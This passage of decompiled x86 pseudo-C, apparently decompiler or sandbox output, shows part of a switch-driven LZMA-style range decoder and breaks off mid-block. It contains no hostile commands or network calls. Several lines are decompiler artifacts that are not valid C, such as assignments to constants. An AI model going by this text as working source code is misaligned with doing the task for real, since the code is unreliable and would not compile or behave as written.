                                                                                                                                                                                      											__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                                                                                      											if( *(__ebp - 0x40) != 1) {
                                                                                                                                                                                      												__eax =  *(__ebp - 0x24);
                                                                                                                                                                                      												 *(__ebp - 0x80) = 0x16;
                                                                                                                                                                                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                                      												__eax =  *(__ebp - 0x28);
                                                                                                                                                                                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                                      												__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                      												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                                      												__eax = 0;
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                      												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                                      												__al = __al & 0x000000fd;
                                                                                                                                                                                      												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                                      												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                                      												__eax =  *(__ebp - 4);
                                                                                                                                                                                      												__eax =  *(__ebp - 4) + 0x664;
                                                                                                                                                                                      												__eflags = __eax;
                                                                                                                                                                                      												 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                      												goto L69;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__eax =  *(__ebp - 4);
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                      											 *(__ebp - 0x84) = 8;
                                                                                                                                                                                      											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                      											goto L132;
                                                                                                                                                                                      										case 8:
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                      												__eax =  *(__ebp - 4);
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                      												 *(__ebp - 0x84) = 0xa;
                                                                                                                                                                                      												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												__eax =  *(__ebp - 0x38);
                                                                                                                                                                                      												__ecx =  *(__ebp - 4);
                                                                                                                                                                                      												__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                                                                                      												 *(__ebp - 0x84) = 9;
                                                                                                                                                                                      												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                                                                                      												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											goto L132;
                                                                                                                                                                                      										case 9:
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                      												goto L90;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x60);
                                                                                                                                                                                      											if( *(__ebp - 0x60) == 0) {
                                                                                                                                                                                      												goto L171;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__eax = 0;
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                      											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                                                                                      											__eflags = _t259;
                                                                                                                                                                                      											0 | _t259 = _t259 + _t259 + 9;
                                                                                                                                                                                      											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                                                                                                                                      											goto L76;
                                                                                                                                                                                      										case 0xa:
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                      												__eax =  *(__ebp - 4);
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                      												 *(__ebp - 0x84) = 0xb;
                                                                                                                                                                                      												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                      												goto L132;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__eax =  *(__ebp - 0x28);
                                                                                                                                                                                      											goto L89;
                                                                                                                                                                                      										case 0xb:
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x24);
                                                                                                                                                                                      												__eax =  *(__ebp - 0x20);
                                                                                                                                                                                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												__eax =  *(__ebp - 0x24);
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x28);
                                                                                                                                                                                      											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                                      											L89:
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x2c);
                                                                                                                                                                                      											 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                      											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                                      											L90:
                                                                                                                                                                                      											__eax =  *(__ebp - 4);
                                                                                                                                                                                      											 *(__ebp - 0x80) = 0x15;
                                                                                                                                                                                      											__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                                      											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                                      											goto L69;
                                                                                                                                                                                      										case 0xc:
                                                                                                                                                                                      											L100:
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                      												 *(__ebp - 0x88) = 0xc;
                                                                                                                                                                                      												goto L170;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											_t335 = __ebp - 0x70;
                                                                                                                                                                                      											 *_t335 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                      											__eflags =  *_t335;
                                                                                                                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                      											goto L102;
                                                                                                                                                                                      										case 0xd:
                                                                                                                                                                                      											L37:
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                      												 *(__ebp - 0x88) = 0xd;
                                                                                                                                                                                      												goto L170;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											_t122 = __ebp - 0x70;
                                                                                                                                                                                      											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                      											__eflags =  *_t122;
                                                                                                                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											L39:
                                                                                                                                                                                      											__eax =  *(__ebp - 0x40);
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                                      											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                                                                                      												goto L48;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__eflags = __ebx - 0x100;
                                                                                                                                                                                      											if(__ebx >= 0x100) {
                                                                                                                                                                                      												goto L54;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L41:
                                                                                                                                                                                      											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                                                                                      											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                      											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                                                                                      											 *(__ebp - 0x48) = __eax;
                                                                                                                                                                                      											__eax = __eax + 1;
                                                                                                                                                                                      											__eax = __eax << 8;
                                                                                                                                                                                      											__eax = __eax + __ebx;
                                                                                                                                                                                      											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                      											__ax =  *__esi;
                                                                                                                                                                                      											 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                      											__edx = __ax & 0x0000ffff;
                                                                                                                                                                                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                                                                                      											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      												__cx = __ax;
                                                                                                                                                                                      												 *(__ebp - 0x40) = 1;
                                                                                                                                                                                      												__cx = __ax >> 5;
                                                                                                                                                                                      												__eflags = __eax;
                                                                                                                                                                                      												__ebx = __ebx + __ebx + 1;
                                                                                                                                                                                      												 *__esi = __ax;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                                                                                      												 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                      												0x800 = 0x800 - __edx;
                                                                                                                                                                                      												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                                                                                      												__ebx = __ebx + __ebx;
                                                                                                                                                                                      												 *__esi = __cx;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                      											 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                      											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                      												goto L39;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												goto L37;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										case 0xe:
                                                                                                                                                                                      											L46:
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                      												 *(__ebp - 0x88) = 0xe;
                                                                                                                                                                                      												goto L170;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											_t156 = __ebp - 0x70;
                                                                                                                                                                                      											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                      											__eflags =  *_t156;
                                                                                                                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											while(1) {
                                                                                                                                                                                      												L48:
                                                                                                                                                                                      												__eflags = __ebx - 0x100;
                                                                                                                                                                                      												if(__ebx >= 0x100) {
                                                                                                                                                                                      													break;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__eax =  *(__ebp - 0x58);
                                                                                                                                                                                      												__edx = __ebx + __ebx;
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                      												__esi = __edx + __eax;
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                      												__ax =  *__esi;
                                                                                                                                                                                      												 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                      												__edi = __ax & 0x0000ffff;
                                                                                                                                                                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      													__cx = __ax;
                                                                                                                                                                                      													_t170 = __edx + 1; // 0x1
                                                                                                                                                                                      													__ebx = _t170;
                                                                                                                                                                                      													__cx = __ax >> 5;
                                                                                                                                                                                      													__eflags = __eax;
                                                                                                                                                                                      													 *__esi = __ax;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                      													0x800 = 0x800 - __edi;
                                                                                                                                                                                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                      													__ebx = __ebx + __ebx;
                                                                                                                                                                                      													 *__esi = __cx;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                      												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                      													continue;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													goto L46;
                                                                                                                                                                                      												}
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L54:
                                                                                                                                                                                      											_t173 = __ebp - 0x34;
                                                                                                                                                                                      											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                                                                                      											__eflags =  *_t173;
                                                                                                                                                                                      											goto L55;
                                                                                                                                                                                      										case 0xf:
                                                                                                                                                                                      											L58:
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                      												 *(__ebp - 0x88) = 0xf;
                                                                                                                                                                                      												goto L170;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											_t203 = __ebp - 0x70;
                                                                                                                                                                                      											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                      											__eflags =  *_t203;
                                                                                                                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											L60:
                                                                                                                                                                                      											__eflags = __ebx - 0x100;
                                                                                                                                                                                      											if(__ebx >= 0x100) {
                                                                                                                                                                                      												L55:
                                                                                                                                                                                      												__al =  *(__ebp - 0x44);
                                                                                                                                                                                      												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                                                                                      												goto L56;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L61:
                                                                                                                                                                                      											__eax =  *(__ebp - 0x58);
                                                                                                                                                                                      											__edx = __ebx + __ebx;
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                      											__esi = __edx + __eax;
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                      											__ax =  *__esi;
                                                                                                                                                                                      											 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                      											__edi = __ax & 0x0000ffff;
                                                                                                                                                                                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                      											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      												__cx = __ax;
                                                                                                                                                                                      												_t217 = __edx + 1; // 0x1
                                                                                                                                                                                      												__ebx = _t217;
                                                                                                                                                                                      												__cx = __ax >> 5;
                                                                                                                                                                                      												__eflags = __eax;
                                                                                                                                                                                      												 *__esi = __ax;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                      												0x800 = 0x800 - __edi;
                                                                                                                                                                                      												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                      												__ebx = __ebx + __ebx;
                                                                                                                                                                                      												 *__esi = __cx;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                      											 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                      											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                      												goto L60;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												goto L58;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										case 0x10:
                                                                                                                                                                                      											L110:
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                      												 *(__ebp - 0x88) = 0x10;
                                                                                                                                                                                      												goto L170;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											_t366 = __ebp - 0x70;
                                                                                                                                                                                      											 *_t366 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                      											__eflags =  *_t366;
                                                                                                                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											goto L112;
                                                                                                                                                                                      										case 0x11:
                                                                                                                                                                                      											L69:
                                                                                                                                                                                      											__esi =  *(__ebp - 0x58);
                                                                                                                                                                                      											 *(__ebp - 0x84) = 0x12;
                                                                                                                                                                                      											L132:
                                                                                                                                                                                      											 *(_t612 - 0x54) = _t605;
                                                                                                                                                                                      											goto L133;
                                                                                                                                                                                      										case 0x12:
                                                                                                                                                                                      											goto L0;
                                                                                                                                                                                      										case 0x13:
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                      												_t469 = __ebp - 0x58;
                                                                                                                                                                                      												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                                                                                      												__eflags =  *_t469;
                                                                                                                                                                                      												 *(__ebp - 0x30) = 0x10;
                                                                                                                                                                                      												 *(__ebp - 0x40) = 8;
                                                                                                                                                                                      												goto L144;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__eax =  *(__ebp - 0x4c);
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                      											__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                                      											 *(__ebp - 0x30) = 8;
                                                                                                                                                                                      											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                                                                                      											goto L130;
                                                                                                                                                                                      										case 0x14:
                                                                                                                                                                                      											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                                                                                      											__eax =  *(__ebp - 0x80);
                                                                                                                                                                                      											L140:
                                                                                                                                                                                      											 *(_t612 - 0x88) = _t533;
                                                                                                                                                                                      											goto L1;
                                                                                                                                                                                      										case 0x15:
                                                                                                                                                                                      											__eax = 0;
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                      											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                                      											__al = __al & 0x000000fd;
                                                                                                                                                                                      											__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                      											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                      											goto L121;
                                                                                                                                                                                      										case 0x16:
                                                                                                                                                                                      											__eax =  *(__ebp - 0x30);
                                                                                                                                                                                      											__eflags = __eax - 4;
                                                                                                                                                                                      											if(__eax >= 4) {
                                                                                                                                                                                      												_push(3);
                                                                                                                                                                                      												_pop(__eax);
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__ecx =  *(__ebp - 4);
                                                                                                                                                                                      											 *(__ebp - 0x40) = 6;
                                                                                                                                                                                      											__eax = __eax << 7;
                                                                                                                                                                                      											 *(__ebp - 0x7c) = 0x19;
                                                                                                                                                                                      											 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                      											goto L145;
                                                                                                                                                                                      										case 0x17:
                                                                                                                                                                                      											goto L145;
                                                                                                                                                                                      										case 0x18:
                                                                                                                                                                                      											L146:
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                      												 *(__ebp - 0x88) = 0x18;
                                                                                                                                                                                      												goto L170;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											_t484 = __ebp - 0x70;
                                                                                                                                                                                      											 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                      											__eflags =  *_t484;
                                                                                                                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											L148:
                                                                                                                                                                                      											_t487 = __ebp - 0x48;
                                                                                                                                                                                      											 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                                                                                      											__eflags =  *_t487;
                                                                                                                                                                                      											goto L149;
                                                                                                                                                                                      										case 0x19:
                                                                                                                                                                                      											__eflags = __ebx - 4;
                                                                                                                                                                                      											if(__ebx < 4) {
                                                                                                                                                                                      												 *(__ebp - 0x2c) = __ebx;
                                                                                                                                                                                      												L120:
                                                                                                                                                                                      												_t394 = __ebp - 0x2c;
                                                                                                                                                                                      												 *_t394 =  *(__ebp - 0x2c) + 1;
                                                                                                                                                                                      												__eflags =  *_t394;
                                                                                                                                                                                      												L121:
                                                                                                                                                                                      												__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                      												__eflags = __eax;
                                                                                                                                                                                      												if(__eax == 0) {
                                                                                                                                                                                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                                                                                      													goto L170;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                                                                                      												if(__eax >  *(__ebp - 0x60)) {
                                                                                                                                                                                      													goto L171;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                                                                                      												__eax =  *(__ebp - 0x30);
                                                                                                                                                                                      												_t401 = __ebp - 0x60;
                                                                                                                                                                                      												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                                                                                      												__eflags =  *_t401;
                                                                                                                                                                                      												goto L124;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__ecx = __ebx;
                                                                                                                                                                                      											__eax = __ebx;
                                                                                                                                                                                      											__ecx = __ebx >> 1;
                                                                                                                                                                                      											__eax = __ebx & 0x00000001;
                                                                                                                                                                                      											__ecx = (__ebx >> 1) - 1;
                                                                                                                                                                                      											__al = __al | 0x00000002;
                                                                                                                                                                                      											__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                                                                                      											__eflags = __ebx - 0xe;
                                                                                                                                                                                      											 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                      											if(__ebx >= 0xe) {
                                                                                                                                                                                      												__ebx = 0;
                                                                                                                                                                                      												 *(__ebp - 0x48) = __ecx;
                                                                                                                                                                                      												L103:
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x48);
                                                                                                                                                                                      												if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                                      													__eax = __eax + __ebx;
                                                                                                                                                                                      													 *(__ebp - 0x40) = 4;
                                                                                                                                                                                      													 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                      													__eax =  *(__ebp - 4);
                                                                                                                                                                                      													__eax =  *(__ebp - 4) + 0x644;
                                                                                                                                                                                      													__eflags = __eax;
                                                                                                                                                                                      													L109:
                                                                                                                                                                                      													__ebx = 0;
                                                                                                                                                                                      													 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                      													 *(__ebp - 0x50) = 1;
                                                                                                                                                                                      													 *(__ebp - 0x44) = 0;
                                                                                                                                                                                      													 *(__ebp - 0x48) = 0;
                                                                                                                                                                                      													L113:
                                                                                                                                                                                      													__eax =  *(__ebp - 0x40);
                                                                                                                                                                                      													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                                      													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                                                                                      														_t392 = __ebp - 0x2c;
                                                                                                                                                                                      														 *_t392 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                                                                                      														__eflags =  *_t392;
                                                                                                                                                                                      														goto L120;
                                                                                                                                                                                      													}
                                                                                                                                                                                      													__eax =  *(__ebp - 0x50);
                                                                                                                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                      													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                                                      													__eax =  *(__ebp - 0x58);
                                                                                                                                                                                      													__esi = __edi + __eax;
                                                                                                                                                                                      													 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                      													__ax =  *__esi;
                                                                                                                                                                                      													__ecx = __ax & 0x0000ffff;
                                                                                                                                                                                      													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                                                                                      													__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                                                                                      													if( *(__ebp - 0xc) >= __edx) {
                                                                                                                                                                                      														__ecx = 0;
                                                                                                                                                                                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                                                                                      														__ecx = 1;
                                                                                                                                                                                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                                                                                      														__ebx = 1;
                                                                                                                                                                                      														__ecx =  *(__ebp - 0x48);
                                                                                                                                                                                      														__ebx = 1 << __cl;
                                                                                                                                                                                      														__ecx = 1 << __cl;
                                                                                                                                                                                      														__ebx =  *(__ebp - 0x44);
                                                                                                                                                                                      														__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                                                                                      														__cx = __ax;
                                                                                                                                                                                      														__cx = __ax >> 5;
                                                                                                                                                                                      														__eax = __eax - __ecx;
                                                                                                                                                                                      														__edi = __edi + 1;
                                                                                                                                                                                      														__eflags = __edi;
                                                                                                                                                                                      														 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                      														 *__esi = __ax;
                                                                                                                                                                                      														 *(__ebp - 0x50) = __edi;
                                                                                                                                                                                      													} else {
                                                                                                                                                                                      														 *(__ebp - 0x10) = __edx;
                                                                                                                                                                                      														0x800 = 0x800 - __ecx;
                                                                                                                                                                                      														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                                                                                      														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                                                      														 *__esi = __dx;
